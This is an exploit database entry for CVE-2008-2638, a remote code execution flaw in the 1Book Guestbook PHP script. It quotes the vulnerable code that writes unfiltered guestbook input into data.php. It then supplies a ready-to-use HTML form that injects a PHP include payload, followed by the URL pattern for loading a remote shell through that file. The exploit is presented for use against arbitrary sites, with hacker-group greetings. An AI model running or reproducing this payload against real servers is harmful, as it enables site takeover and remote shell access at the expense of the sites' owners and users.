1Book Guestbook Script - Code Execution Vulnerability

2008-06-03T00:00:00
ID EDB-ID:5736
Type exploitdb
Reporter JIKO
Modified 2008-06-03T00:00:00

Description

1Book Guestbook Script Code Execution Vulnerability. CVE-2008-2638. Webapps exploit for php platform

                                        
                                            =========================================================
=============== JIKI TEAM [ Maroc And YameN ]===============
=========================================================
# Author  : jiko
# email  : jalikom@hotmail.fr
# Home   : www.no-back.org & no-exploit.com
# Script  : 1Book Guestbook Script
# Bug   : remote code execution
# Download  : http://1scripts.net/scripts/1book.zip
=========================JIkI Team===================

 # if(in_array($_POST['username'], $bannedusers))
 # echo 'Your username has been banned by the administrator.<br/><br/>';
 # if(in_array($_SERVER['REMOTE_ADDR'], $bannedips))
 # echo 'Your IP has been banned by the administrator.<br/><br/>';
 # elseif($_POST['1'] + $_POST['2'] != $_POST['check'])
 # echo('You answered the security question incorrectly.');
 # else
 # {
 # $data = unserialize(file_get_contents('data.php'));
 # array_push($data, array('user' => $_POST['username'], 'date' =>
 mktime(), 'message' => $_POST['message'], 'website' =>
 $_POST['website'], 'ip' => $_SERVER['REMOTE_ADDR']));
 # file_put_contents('data.php', serialize($data));
 # }
 #
 #}

 #===========================================================================================================================#
 # So, we can write a malicious code like <?php include($jiko); ?> in
 the variable $message, and $username #
 # and then we go in
            http://Site/script/data/data.php?jiko=[shell]
 #
 #===========================================================================================================================#
 simple exploit whith HTML:
 -------------------------
 change site by your site
 +++++++++++++++++++++++++

 <title> EXploit BY JIKO</title>
 <center>
 <form method="post" action="site/guestbook.php">
 <input type=hidden name=username value="jiko was here" >
 <input type=hidden name=message value="<? include($jiko) ?>" >
 <input type=submit value="send">
 </form>
 <h5>a fter send your usage:
 <br>http://site/scripts/data.php?jiko=[shell]</h5>

 
=========================================================
 greetz:
 all my friend [kil1er & GhosT HaCkEr & stack ] and H-T Team and all No-back members and tryag.Com
 visit: www.no-back.org & www.tryag.com & no-exploit.com
=========================================================
**************************
 hello brother i want chnage my name Jiki Team to JiKo and my email to
 jalikom@hotmail.fr  and this a news bug
 remote code execution

# milw0rm.com [2008-06-03]